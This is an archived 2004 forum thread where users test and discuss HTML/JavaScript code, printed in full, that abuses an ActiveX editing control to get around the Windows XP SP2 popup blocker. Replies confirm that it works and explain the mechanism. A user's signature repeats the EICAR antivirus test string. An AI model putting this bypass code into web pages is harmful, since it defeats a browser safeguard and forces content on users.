• Welcome to Valhalla Legends Archive.
 

Defeating XP SP2 Popup Blocker

Started by iago, December 10, 2004, 03:06 PM

Previous topic - Next topic

iago

http://www.malware.com/flopup.html

Can somebody confirm that that works to block SP2's popup blocker? I don't have an SP2 machine handy to test it on.  The code for it is:

<body onload="setTimeout('   main()   ',1000)">
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>

<SCRIPT>

// 10.11.04 http://www.editive.com

function shellscript()
{
open("http://www.malware.com/flywin.html","_blank","scrollbar=no");
showModalDialog("http://www.malware.com/flywin.html");
}

function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}
</SCRIPT>
<br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center>
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


dxoigmn

Works here, that code bypasses the popup blocker.

MyndFyre

That's because it doesn't actually use popups (the popup blocker blocks window.open() in Javascript).  That COM class is "DHTML Edit Control Safe for Scripting for IE5" so I'm not sure what he did in the web page dialog object, but it sucks.  Wonderful to have.
QuoteEvery generation of humans believed it had all the answers it needed, except for a few mysteries they assumed would be solved at any moment. And they all believed their ancestors were simplistic and deluded. What are the odds that you are the first generation of humans who will understand reality?

After 3 years, it's on the horizon.  The new JinxBot, and BN#, the managed Battle.net Client library.

Quote from: chyea on January 16, 2009, 05:05 PM
You've just located global warming.

iago

In any case, it never showed up with Firefox.  So I win :)
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


hismajesty

when I went to that page with IE it wanted me to install frontpage!

quasi-modo

Popups are becoming less of a problem. Nowadays I am browsing with javascript turned off altogether because of annoying divs with ads in them sliding across my screen, etc.
WAR EAGLE!
Quote(00:04:08) zdv17: yeah i quit doing that stuff cause it jacked up the power bill too much
(00:04:19) nick is a turtle: Right now im not paying the power bill though
(00:04:33) nick is a turtle: if i had to pay the electric bill
(00:04:47) nick is a turtle: id hibernate when i go to class
(00:04:57) nick is a turtle: or at least when i go to sleep
(00:08:50) zdv17: hibernating in class is cool.. esp. when you leave a drool puddle

MyndFyre

At work:

Quote
Access Denied (content_filter_denied)


Your request was denied because of its content categorization: "Hacking;Information Technology" 


For assistance, contact your network support team. 
QuoteEvery generation of humans believed it had all the answers it needed, except for a few mysteries they assumed would be solved at any moment. And they all believed their ancestors were simplistic and deluded. What are the odds that you are the first generation of humans who will understand reality?

After 3 years, it's on the horizon.  The new JinxBot, and BN#, the managed Battle.net Client library.

Quote from: chyea on January 16, 2009, 05:05 PM
You've just located global warming.

iago

Well, it IS malware.com.  At the moment, we don't have content filters at work, but we should.
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


Spht


Maddox

asdf.